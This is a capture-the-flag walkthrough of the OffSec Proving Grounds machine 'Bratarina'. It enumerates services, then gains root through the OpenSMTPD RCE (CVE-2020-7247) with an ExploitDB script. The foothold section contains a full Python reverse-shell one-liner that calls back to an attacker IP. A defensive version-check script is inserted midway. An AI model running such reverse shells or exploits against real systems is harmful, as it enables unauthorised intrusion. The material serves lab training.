Target // Bratarina
Platform: OffSec Proving Grounds
OS: Linux
Difficulty: Easy
IP: 192.168.206.71

Recon

Nmap

nmap -sC -sV -oN nmap/initial 192.168.206.71

Full nmap output:
PORT    STATE  SERVICE     VERSION
22/tcp  open   ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
25/tcp  open   smtp        OpenSMTPD
|_ 2.0.0 This is OpenSMTPD 2.0.0
53/tcp  closed domain
80/tcp  open   http        nginx 1.14.0 (Ubuntu)
|_http-title: Page not found - FlaskBB
445/tcp open   netbios-ssn Samba smbd 4.7.6-Ubuntu

Enumeration

Port 80 - Web App (FlaskBB)

A Flask-based forum. No useful content, weird behavior with empty Host: header. Rabbit hole – moving on.

Port 445 - SMB

smbmap -H 192.168.206.71 -u '' -p '' -r
backups    READ ONLY    Share for backups
  └── passwd.bak

Downloaded passwd.bak – it’s just a copy of /etc/passwd. Another rabbit hole.

Port 25 - SMTP

[ Flag ]
This is the attack vector. OpenSMTPD 2.0.0 is ancient and has known RCE vulnerabilities.

smtp-commands: bratarina Hello nmap.scanme.org, pleased to meet you
2.0.0 This is OpenSMTPD 2.0.0
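A defender-side version gate for this enumeration step, added here as an example (it is not part of the original write-up or of the exploit): it parses nmap -oN output like the scan above and flags any OpenSMTPD banner older than 6.6.2p1, the release that fixed CVE-2020-7247. The nmap text is the write-up's own output embedded as a constructed sample; the helper names are my own.

```python
import re
from typing import NamedTuple, Optional

# Constructed sample: the nmap -oN output quoted in this write-up.
NMAP_OUTPUT = """\
PORT    STATE  SERVICE     VERSION
22/tcp  open   ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
25/tcp  open   smtp        OpenSMTPD
|_ 2.0.0 This is OpenSMTPD 2.0.0
53/tcp  closed domain
80/tcp  open   http        nginx 1.14.0 (Ubuntu)
445/tcp open   netbios-ssn Samba smbd 4.7.6-Ubuntu
"""

# CVE-2020-7247 was fixed in OpenSMTPD 6.6.2p1; any older banner is treated as affected.
FIXED_VERSION = (6, 6, 2)

class Finding(NamedTuple):
    port: int
    version: str
    affected: bool

def parse_version(text: str) -> Optional[tuple]:
    """Extract (major, minor, patch) from e.g. '6.6.1p1' or '2.0.0'; None if no version."""
    m = re.search(r"\b(\d+)\.(\d+)\.(\d+)", text)
    return tuple(int(x) for x in m.groups()) if m else None

def find_opensmtpd(nmap_text: str) -> list:
    """Walk the port table; the banner may sit on the smtp line or on a '|_' script line below it."""
    findings, smtp_port = [], None
    for line in nmap_text.splitlines():
        port_line = re.match(r"^(\d+)/(?:tcp|udp)\s+(\w+)\s+(\S+)", line)
        if port_line:
            port, state, service = port_line.groups()
            # Only an open smtp service opens a block; any other port line closes it.
            smtp_port = int(port) if state == "open" and service == "smtp" else None
        if smtp_port is not None and "OpenSMTPD" in line:
            ver = parse_version(line)
            if ver:
                findings.append(Finding(smtp_port, ".".join(map(str, ver)), ver < FIXED_VERSION))
                smtp_port = None  # one finding per smtp service
    return findings

if __name__ == "__main__":
    for f in find_opensmtpd(NMAP_OUTPUT):
        status = "AFFECTED by CVE-2020-7247" if f.affected else "not affected"
        print(f"port {f.port}: OpenSMTPD {f.version} -> {status}")
```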

Foothold

OpenSMTPD RCE (CVE-2020-7247)

Found an exploit on ExploitDB. First, validate RCE with a ping:

python3 ./47984.py 192.168.206.71 25 'ping 192.168.49.206 -c 5'

Confirmed via tcpdump. Now for a shell – the tricky part. The exploit doesn’t handle special characters well (<, >, |, & are all problematic):

Exploit execution issues

[ Warning ]
Most reverse shell one-liners won’t work here because the exploit chokes on special characters. Python’s subprocess module with escaped quotes is the way to go.

The working payload – escape all commas in the Python reverse shell:

python3 ./47984.py 192.168.206.71 25 'python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.49.206\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);"'

Privilege Escalation

No privesc needed – the OpenSMTPD exploit lands us directly as root.


Proof


local.txt: [redacted]
proof.txt: [redacted]

Key Takeaways

[ Note ]
  • Enumerate all service versions thoroughly – the web app and SMB were rabbit holes, SMTP was the way in
  • When exploit payloads break due to character escaping, try Python’s subprocess module with carefully escaped quotes
  • OpenSMTPD 2.0.0 is critically vulnerable – always check for known CVEs on outdated services